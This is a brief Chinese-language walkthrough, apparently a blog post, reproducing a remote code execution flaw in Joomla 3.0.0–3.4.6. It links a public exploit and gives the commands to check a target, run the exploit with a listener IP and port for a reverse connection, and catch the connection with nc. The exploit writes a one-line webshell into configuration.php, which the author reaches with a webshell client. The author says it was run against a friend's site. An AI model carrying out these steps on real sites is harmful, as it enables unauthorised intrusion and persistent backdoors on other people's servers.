Joomla 3.0.0 --> 3.4.6-RCE复现

Joomla是一款网站管理系统CMS，最近曝出其3.00-3.4.6的joomla版本存在一个RCE漏洞。

并且大佬已将exp放在了github上，下载地址：https://www.exploit-db.com/exploits/47465

该exp是用python3写的

环境的话，可以自己在服务器或者本机上搭建一个joomla对应的版本，网上很多教程。

我这里直接使用一个朋友的站来做实验，我们先用这个python文件验证是否存在该漏洞：

python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/

 

 

 

 像这样最后显示use --exploit to exploit it 就说明此站点存在这个rce漏洞

然后利用exp的命令：

python3 Joomla3.4.6-RCE-exp.py -t http://yourhost/ --exploit --lhost 192.168.1.120 --lport 9000 //用于监听的主机的ip和一个不占用的端口

 

 然后用本机通过nc来监听9000端口：

 

 之后再运行exp的命令，将自动写入一句话木马到根目录下面的configuration.php文件里面：

 出现如上图所示的字符串即是一句话木马的随机密码。

然后菜刀连接

 

 最后成功getshell。